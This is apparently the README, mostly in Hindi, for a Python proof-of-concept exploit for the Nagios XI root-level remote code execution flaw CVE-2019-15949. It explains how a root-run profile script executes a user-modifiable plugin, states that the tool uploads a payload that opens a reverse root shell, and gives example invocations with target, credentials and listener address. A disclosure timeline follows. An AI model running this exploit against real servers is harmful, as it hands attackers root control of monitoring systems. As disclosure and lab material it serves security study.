
a PoC for the Nagios CVE-2019-15949 rce in python
CVE-2019-15949 के लिए एक python PoC
Nagios XI <= 5.6.5 में एक कमजोरी मौजूद है जो हमलावर को RCE का उपयोग करके रूट विशेषाधिकार प्राप्त करने की अनुमति देती है। इस शोषण के लिए सर्वर तक 'nagios' उपयोगकर्ता के रूप में पहुंच, या CCM के माध्यम से वेब इंटरफ़ेस से प्लगइन प्रबंधित करने की अनुमति के साथ पहुंच आवश्यक है।
getprofile.sh स्क्रिप्ट, जो सिस्टम प्रोफ़ाइल (profile.php?cmd=download) डाउनलोड करने से शुरू होती है, पासवर्ड रहित sudo एंट्री के माध्यम से रूट के रूप में निष्पादित होती है; यह स्क्रिप्ट 'check_plugin' निष्पादन योग्य को चलाती है जो nagios उपयोगकर्ता के स्वामित्व में है। Nagios XI में प्लगइन संशोधित करने की अनुमति वाला उपयोगकर्ता, या सर्वर पर 'nagios' उपयोगकर्ता, 'check_plugin' निष्पादन योग्य को संशोधित कर सकता है और रूट के रूप में निष्पादित होने वाले दुर्भावनापूर्ण कमांड डाल सकता है।
एक PHP POC विकसित किया गया है जो एक पेलोड अपलोड करता है जिसके परिणामस्वरूप रिवर्स रूट शैल प्राप्त होती है। उपयोग:
python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport
उदाहरण:
python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444
Nagios को रिपोर्ट किया गया: 29th July 2019 Nagios द्वारा पुष्टि की गई: 29th July 2019 संस्करण 5.6.6 में तय किया गया: 20th August 2019 CVE असाइन किया गया: 6th September 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)